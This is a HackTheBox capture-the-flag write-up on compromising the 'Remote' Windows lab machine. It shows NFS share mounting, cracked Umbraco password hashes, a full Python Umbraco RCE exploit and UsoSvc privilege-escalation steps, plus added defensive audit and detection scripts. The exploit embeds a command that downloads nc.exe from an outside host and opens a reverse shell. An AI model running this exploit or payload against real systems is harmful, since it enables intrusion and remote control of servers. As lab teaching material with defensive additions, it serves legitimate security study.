Hello there, welcome back again. Today I’m going to do the walkthrough and write-up on the new HackTheBox Windows easy machine Remote (10.10.10.180) by mrb3n.
This machine is all about finding a Windows NFS (Network File System) share, obtaining a password hash from it, cracking it, getting a shell as a user by exploiting Umbraco CMS for RCE, and finally getting a shell as administrator. I used the Umbraco CMS – Remote Code Execution exploit by Gregory DRAPERI & Hugo BOUTINON.
Let’s get started then.
GETTING MY FOOT IN
As always, I added the machine IP (10.10.10.180) to my hosts file as remote.htb and started with an intense NMAP port scan.
The NMAP Scan
$ nmap -T5 -sC -p- -oA nmap.scan remote.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-24 09:55 +03
Not shown: 65519 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2m17s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-24T07:10:04
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 849.48 seconds
I found many open ports, mostly Windows RPC ports, plus HTTP on 80, FTP on 21, rpcbind on 111 and so on.
Port 80 serves a website called “Acme Widgets”.
Neither the website nor its source code revealed anything useful, so I proceeded to look for hidden directories using GoBuster.
While GoBuster was running, I started checking the detected directories one by one. There is a blog, an e-commerce store, contact details and an “/Install” directory. When you see a directory named “install” you normally stop everything and look into it; well, I did the same.
When I visited http://remote.htb/install it redirected me to http://remote.htb/umbraco/#/login, and I was welcomed with a login page. 🙂
However, I was not able to go any further because my attempt to brute-force the login page failed. I let DirBuster keep running and started to look into the other open ports, until I noticed something unusual.
Windows NFS Mounting
If you looked closely at the nmap scan, port 111 is open. Port 111 (rpcbind) is normally used to map other RPC services (such as nfs, nlockmgr, quotad, mountd, etc.) to their corresponding port numbers on the server.
On Linux, you can use the showmount command to list the directories an NFS server exports, like below:
When I ran the showmount command, I noticed the /site_backups export is available to everyone.
With very little effort you can mount the public export on your Kali machine and read its contents. Linux has the mount command, which is similar to the “map network drive” option in Windows.
Mounting the NFS Share
I created a directory “site_backup” inside my working directory for the Remote machine, ran the command mount -t nfs remote.htb:/site_backups ./site_backup, and the site_backups export was mounted on my Kali machine.
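As an added example (not part of the original write-up), here is the defender's side of this step in Python: a small audit that parses the export list showmount -e prints and flags any export whose client list is a wildcard, which is exactly what made /site_backups readable to everyone here. The sample output is constructed to resemble what the scan returned; the audit_host helper is an assumption about running showmount against a host you administer.

```python
"""Audit an NFS export list for shares that any client may mount.

Added example, not the write-up's own code. It parses the text printed by
`showmount -e <host>` and reports exports whose client list is a wildcard
("(everyone)" as Windows NFS reports it, or "*" on Linux servers).
"""
import re
import subprocess
from typing import Dict, List

# Constructed sample of `showmount -e remote.htb` output (not captured from the box).
SAMPLE_SHOWMOUNT = """\
Export list for remote.htb:
/site_backups (everyone)
/internal     10.10.10.0/24,admin.htb
"""

# Client-list tokens that mean "no restriction at all".
WILDCARDS = {"(everyone)", "everyone", "*"}


def parse_exports(text: str) -> Dict[str, List[str]]:
    """Return {export_path: [allowed_clients]} from showmount -e output."""
    exports: Dict[str, List[str]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.lower().startswith("export list for"):
            continue
        path, _, clients = line.partition(" ")
        exports[path] = [c for c in re.split(r"[,\s]+", clients.strip()) if c]
    return exports


def open_exports(exports: Dict[str, List[str]]) -> List[str]:
    """Paths whose client list contains a wildcard, i.e. any host may mount them."""
    return sorted(
        path for path, clients in exports.items()
        if any(c.lower() in WILDCARDS for c in clients)
    )


def audit_host(host: str) -> List[str]:
    """Run showmount against a host you administer and return its open exports.

    Assumption: the showmount binary (nfs-common on Debian/Kali) is installed.
    """
    result = subprocess.run(["showmount", "-e", host], capture_output=True,
                            text=True, check=True)
    return open_exports(parse_exports(result.stdout))


if __name__ == "__main__":
    # Offline demonstration on the constructed sample.
    for path in open_exports(parse_exports(SAMPLE_SHOWMOUNT)):
        print(f"WORLD-MOUNTABLE: {path}")
```

The fix on the server side is to restrict each export to the specific client hosts or subnets that need it, and to keep site backups (which, as this box shows, carry the application database) off any export at all.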
I started to look through the directories and files inside site_backup. The file Web.config didn’t reveal much. In the HTB forum thread for Remote, a user mentioned that a file with the “.sdf” extension would help, so I started to look for it. After spending some time I found Umbraco.sdf inside the directory App_data.
Umbraco.sdf is a database file used by Umbraco CMS (an .sdf file is a SQL Server Compact database). A quick Google search led me to an article on how to set up Umbraco with Visual Studio. The article also suggests the .sdf file can be opened using MS SQL.
I moved umbraco.config and Umbraco.sdf to my Windows host machine to work with Visual Studio. Unfortunately, for some reason, I wasn’t able to open the file in Visual Studio; I kept getting a “corrupted” error. So as a last resort, I opened it with my EditPlus text editor (funny, but this actually works; I have opened a lot of database files in EditPlus and read their contents).
After a little clean-up I made a list of the hashed passwords for admin@htb.local and the users smith@htb.local and ssmith@htb.local.
Hashed Credentials:
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
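The records above are runs of concatenated fields, and the JSON tag inside each one says which algorithm protects the password. As an added example (not part of the original write-up), the Python below parses two of those records into algorithm, salt and digest, flags the unsalted SHA1 entry, and confirms the recovered clear-text value against it; it also shows why the HMACSHA256 accounts are a different proposition, since each of them carries its own 16-byte salt. The record layout assumed here (username, email, salt+digest or hex digest, JSON tag, then locale and GUID) is inferred from the listing itself.

```python
"""Classify Umbraco membership password records by hash algorithm.

Added example, not the write-up's own code. Each record from Umbraco.sdf
is a run of concatenated fields: username, email, then either a 40-hex
unsalted SHA1 digest or a base64 salt followed by a base64 HMACSHA256
digest, then a JSON tag naming the algorithm. The parser extracts the
algorithm, salt and digest and flags the unsalted records, which is why
John needed only seconds for the admin account.
"""
import base64
import hashlib
import re
from dataclasses import dataclass
from typing import List, Optional

# Two of the records listed in the write-up, trailing locale/GUID fields kept as found.
RECORDS = [
    'adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50',
    'ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32',
]

ALGO_TAG = re.compile(r'\{"hashAlgorithm":"([A-Za-z0-9]+)"\}')
SHA1_HEX = re.compile(r'([0-9a-f]{40})$')
# 16-byte salt -> 24 base64 chars ending "==", 32-byte digest -> 44 chars ending "=".
B64_SALTED = re.compile(r'([A-Za-z0-9+/]{22}==)([A-Za-z0-9+/]{43}=)$')


@dataclass
class PasswordRecord:
    algorithm: str
    digest: str
    salt: Optional[str]  # None for unsalted algorithms

    @property
    def salted(self) -> bool:
        return self.salt is not None


def parse_record(raw: str) -> PasswordRecord:
    """Extract algorithm, digest and salt from one concatenated .sdf record."""
    tag = ALGO_TAG.search(raw)
    if tag is None:
        raise ValueError("record has no hashAlgorithm tag")
    algorithm = tag.group(1)
    head = raw[:tag.start()]  # everything before the JSON tag
    if algorithm == "SHA1":
        m = SHA1_HEX.search(head)
        if m is None:
            raise ValueError("SHA1 record without a 40-hex digest")
        return PasswordRecord(algorithm, m.group(1), None)
    m = B64_SALTED.search(head)
    if m is None:
        raise ValueError(f"{algorithm} record without base64 salt and digest")
    salt, digest = m.group(1), m.group(2)
    if len(base64.b64decode(salt)) != 16 or len(base64.b64decode(digest)) != 32:
        raise ValueError("unexpected salt or digest length")
    return PasswordRecord(algorithm, digest, salt)


def weak_records(records: List[PasswordRecord]) -> List[PasswordRecord]:
    """Records stored with an unsalted fast hash: one precomputable guess per candidate."""
    return [r for r in records if not r.salted]


def verify_sha1(record: PasswordRecord, candidate: str) -> bool:
    """Confirm a recovered clear-text value against an unsalted SHA1 record."""
    return (record.algorithm == "SHA1"
            and hashlib.sha1(candidate.encode()).hexdigest() == record.digest)


if __name__ == "__main__":
    parsed = [parse_record(r) for r in RECORDS]
    for rec in parsed:
        print(f"{rec.algorithm:<11} salted={rec.salted} digest={rec.digest}")
    print("accounts needing a forced reset and rehash:", len(weak_records(parsed)))
```

On a real deployment the unsalted SHA1 accounts are the ones to force-reset first; the salted ones are not safe to leave alone once the database has leaked, but they cannot be matched against a precomputed list the way the admin hash was.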
Cracking The Hash using John
I copied the admin password hash to Kali and used John to crack it. It took just a couple of seconds.
Clear-text credentials:
admin@htb.local:baconandcheese
The next step is logging in to the CMS using the credentials I just cracked.
And I’m in the admin dashboard of Umbraco CMS.
Exploit
After logging in, things went pretty straightforwardly. As I already knew that Umbraco version 7.12.4 is exploitable, without wasting much time I downloaded the related exploit from exploit-db (https://www.exploit-db.com/exploits/46153), modified it as per my requirements and added the reverse shell.
My Final Exploit with Payload:
# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# CVE: N/A
import requests
from bs4 import BeautifulSoup

def print_dict(dico):
    print(dico.items())

print("Start")
# The original PoC ran calc.exe; here the C# block embedded in the XSLT runs
# powershell.exe with the arguments in cmd and returns its standard output.
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "i -uri http://10.10.14.5:8080/nc.exe -outfile /nav1n/nc.exe;/nav1n/nc.exe 10.10.14.5 4444 -e powershell"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
proc.StartInfo.FileName = "powershell.exe"; proc.StartInfo.Arguments = cmd;\
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
</msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
</xsl:template> </xsl:stylesheet> '
login = "admin@htb.local"
password = "baconandcheese"
host = "http://remote.htb"
# Step 1 - Get Main page (starts the session and collects the initial cookies)
s = requests.session()
url_main = host + "/umbraco/"
r1 = s.get(url_main)
print_dict(r1.cookies)
# Step 2 - Process Login (back-office API; the session object keeps the auth cookies)
url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"
loginfo = {"username": login, "password": password}
r2 = s.post(url_login, json=loginfo)
# Step 3 - Go to vulnerable web page and collect the ASP.NET form state plus the XSRF token
url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx"
r3 = s.get(url_xslt)
soup = BeautifulSoup(r3.text, 'html.parser')
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']
headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN}
data = {"__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": VIEWSTATE, "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR, "ctl00$body$xsltSelection": payload, "ctl00$body$contentPicker$ContentIdValue": "", "ctl00$body$visualizeDo": "Visualize+XSLT"}
# Step 4 - Launch the attack (the visualizer compiles and runs the XSLT payload server-side)
r4 = s.post(url_xslt, data=data, headers=headers)
print("End")
As soon as my exploit was ready, I ran it from the Kali terminal and boom, I had a reverse shell as inetsrv.
User.txt
Once the reverse shell connected, I immediately found User.txt on the Public user’s desktop. I ran the exploit twice because I lost the connection, so here are two user flags 😉
Getting The Root
After spending some time without much of a clue, I got a tip from a fellow HTB user. According to him, I could modify the service whose name starts with “Usxxxc”. The service he meant is UsoSvc, the Update Orchestrator Service, which is part of Windows Update.
A quick search showed me the UsoSvc privilege escalation technique in PayloadsAllTheThings.
Let us get into the real business now. For a successful exploit we need a service whose configuration we can change; in our case that is UsoSvc.
Exploit Procedures
- First, stop the UsoSvc service using the sc.exe stop UsoSvc command.
- Then, set the service’s binary path to the custom payload. When the service is restarted, it runs the reverse shell and the listener receives the shell.
- And lastly, restart the service using the sc.exe start usosvc command.
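This procedure only works because the compromised account holds change-configuration rights on the service, and it leaves a clear trace: the service's ImagePath value under HKLM\System\CurrentControlSet\Services gets rewritten to something that is not the normal svchost.exe line. As an added detection example (not part of the original write-up), the Python below runs that check over a few constructed Sysmon EventID 13 (registry value set) records. The field names TargetObject, Details and Image are the ones Sysmon emits; the events and their values are made up for the demonstration.

```python
"""Flag service ImagePath changes that point a service at a non-system binary.

Added example, not the write-up's own code. It scans JSON-encoded Sysmon
EventID 13 records (registry value set) and reports services whose ImagePath
was changed to a binary outside %SystemRoot%\\System32 or to a command
interpreter, which is the footprint the UsoSvc binary-path technique leaves.
"""
import json
import re
from typing import Dict, List

# Matches "...\Services\<name>\ImagePath" and captures the service name.
SERVICES_KEY = re.compile(r"\\services\\([^\\]+)\\imagepath$", re.IGNORECASE)
# Interpreters and tools that a service ImagePath should never legitimately invoke.
SHELLS = ("powershell", "cmd.exe", "cmd /c", "nc.exe", "rundll32", "mshta", "wscript", "cscript")

# Constructed Sysmon EventID 13 records (field names as Sysmon emits them, values made up).
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"EventID": 13, "Image": "C:\\Windows\\System32\\services.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\UsoSvc\\ImagePath",
     "Details": "%SystemRoot%\\system32\\svchost.exe -k netsvcs -p"},
    {"EventID": 13, "Image": "C:\\Windows\\System32\\sc.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\UsoSvc\\ImagePath",
     "Details": "C:\\Users\\Public\\nc.exe 10.10.14.5 4444 -e powershell"},
    {"EventID": 13, "Image": "C:\\Windows\\System32\\sc.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\UsoSvc\\ImagePath",
     "Details": "cmd /c C:\\Windows\\Temp\\update.bat"},
    {"EventID": 13, "Image": "C:\\Windows\\regedit.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\UsoSvc\\Start",
     "Details": "DWORD (0x00000002)"},
]]


def _normalize(path: str) -> str:
    """Lower-case the value and expand the two environment variables seen in ImagePath."""
    p = path.strip().strip('"').lower()
    return p.replace("%systemroot%", "c:\\windows").replace("%windir%", "c:\\windows")


def suspicious_imagepath(value: str) -> bool:
    """True if the new ImagePath invokes an interpreter or lives outside System32."""
    v = _normalize(value)
    if any(token in v for token in SHELLS):
        return True
    return not v.startswith("c:\\windows\\system32\\")


def check_events(lines: List[str]) -> List[Dict[str, str]]:
    """Return one hit per EventID 13 record that rewrites a service ImagePath suspiciously."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        event = json.loads(line)
        if event.get("EventID") != 13:
            continue
        m = SERVICES_KEY.search(event.get("TargetObject", ""))
        if m is None:
            continue  # some other value under the service key (Start, ObjectName, ...)
        new_path = event.get("Details", "")
        if suspicious_imagepath(new_path):
            hits.append({"service": m.group(1), "new_path": new_path,
                         "changed_by": event.get("Image", "")})
    return hits


if __name__ == "__main__":
    for hit in check_events(SAMPLE_EVENTS):
        print(f"ALERT service={hit['service']} by={hit['changed_by']} path={hit['new_path']}")
```

The detection fires on the two tampered values and stays quiet on the legitimate svchost.exe line and on the unrelated Start value. On the prevention side, the fix is to tighten the service's DACL so that ordinary accounts (including the IIS application pool identity that the web shell runs as) no longer hold SERVICE_CHANGE_CONFIG on UsoSvc.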
Thank you, appreciate the respect 🙂